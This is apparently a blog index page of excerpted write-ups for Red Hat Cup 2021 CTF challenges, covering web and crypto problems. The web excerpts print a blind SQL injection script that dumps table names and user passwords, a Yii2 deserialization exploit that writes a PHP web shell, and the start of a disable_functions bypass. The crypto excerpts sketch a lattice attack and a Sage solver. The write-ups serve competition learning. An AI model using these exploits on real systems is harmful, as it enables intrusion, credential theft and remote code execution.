Category-红帽杯2021

image.php 有sql注入

```

import requests
import sys
session = requests.session()
hh=''
burp0_url = "http://eci-2zeab1jn4vnk23hzs0z3.cloudeci1.ichunqiu.com:80/image.php"
for i in range(1,100):
    for j in range(30,129):
        if j==128:
            sys.exit(1)

        #print(gg)
        params={'id':"2/(select/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctf'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(password)from users),{},1))={})".replace(' ','/**/').format(i,j)}

        r=session.get(burp0_url,params=params)
        a=len(r.text)
        if a>1000:
            hh+=chr(j)
            print(hh)
           break

```

得到密码登录

登录后

File:///flag 得到flag

More »

robots.txt看到1ndexx.php .1ndexx.php.swp泄露

index.php?code=<?php+phpinfo();?>

然后访问hack.php得到flag

More »

Yii2漏洞 about 路由反序列化直接网上exp assert 写shell

```

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("/var/www/html/web/a.php","<?=eval(\\$_POST[a]);?>");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){

            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

```

写shell

需要bypass disable_function

Apache mod cgi 绕过

```

<?php

$cmd = "/readflag > /tmp/1"; //comman

More »

一看到还以为是小数的背包问题, 仔细想想并不是, 来看一下式子就能懂了, 先看得到密文 $ct$ 的式子

c t = 2^{256} (k_{0} m_{0} + k_{1} m_{1} + k_{2} m_{2} + \dots k_{23} m_{23}) - e

$ct = 2^{256}(k_0m_0 + k_1m_1 + k_2m_2 + \cdots k_{23}m_{23}) - e$
这里多了个

- e

$-e$ 就是把取整直接看成减去一个小数

e

$e$ 了

$k_n$ 是已知的, 而且是小数, 不能直接造格子, 但我们把 $2^{256}$ 分配给每一项就不一样了, 对于其中一项

2^{256} k m = 2^{256} \ln p \cdot m = (⌊ 2^{256} \ln p ⌉ - e^{'}) \cdot m

$2^{256}km = 2^{256}\ln p \cdot m = (\lfloor 2^{256} \ln p \rceil - e')\cdot m$
记

⌊ 2^{256} \ln p_{i} ⌉ = A_{i}

$\lfloor 2^{256} \ln p_i \rceil = A_i$ 每一项都这么干, 那么整个

c t

$ct$ 就会变成

More »

超椭圆曲线...第一次接触,但搜到了原题
https://pwnthem0le.polito.it/2020/12/20/hxpCTF-2020-Hyper-writeup/
具体原理我不是很懂也敢乱说

改一下上面链接的exp就可以了

#sage
import itertools
import struct
p = 10000000000000001119
R.<x> = GF(p)[]
y = x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
known_pt = ('a'*20+'flag').encode()
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
FL = True
while FL:
    roots = [r[0] for r in u.change_ring(L).roots()]
    RR.<zz> = PolynomialRing(L)
    v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
    vi = [v.coefficients()[i].as_finite_f

More »

Xp0int Team

Category - 红帽杯2021

web3

Web1 find_it

Web2 framework

[Crypto] primegame - k1rit0

[Crypto] hpcurve - k1rit0